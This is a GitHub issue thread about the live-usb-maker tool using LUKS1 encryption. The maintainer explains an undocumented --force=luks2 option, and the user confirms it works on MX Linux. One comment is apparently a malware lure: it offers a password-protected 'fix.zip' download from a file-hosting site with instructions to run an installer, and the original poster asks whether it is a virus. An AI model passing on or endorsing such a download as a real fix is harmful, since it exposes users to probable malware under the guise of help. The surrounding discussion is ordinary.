### ISSUE TITLE
weak encryption algorithm Luks type 1

### ISSUE THREAD

**Issue by onlineapps-cloud** [BitJam/live-usb-maker#10]
hi, i tried right now this tool and i saw in logs that is used Luks type 1, can you change encryption algorithm to use more secure Luks type 2?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by onlineapps-cloud** [comment]
serious? virus?
![image](https://github.com/user-attachments/assets/f2673def-7537-4b57-998e-b22782d9e6d1)

**Comment by BitJam** [comment]
There is a command line option --force=luks2 that changes the encryption
type to luks2.  This was not advertised because (I think) luks2 didn't work
from within busybox which performs the early boot process. Or something
like that.  If this problem has been fixed and if a new fixed version of
busybox is used then --force=luks2 should make a working encrypted live-usb
using luks2.

**Comment by onlineapps-cloud** [comment]
i checked `live-usb-maker with --force=luks2` and i**t's working** as expected, i checked on mxlinux distro.

**Comment by onlineapps-cloud** [comment]
also i saw that flag `--force=luks2` not exist in app help, can you add it?

**Comment by BitJam** [comment]
I don't maintain the GUI wrapper. I think Adrian from the MX team does
that. You can ask them at the mx-live-usb-maker repo (I think) or over on
the MX forums.

**Comment by onlineapps-cloud** [comment]
yes, i talked with him about luks2, but i talk about live-usb-maker help usage, i cannot find `--force=luks2` argument
![image](https://github.com/user-attachments/assets/d7f5996a-19bc-4b91-a4cb-43ff176a119e)
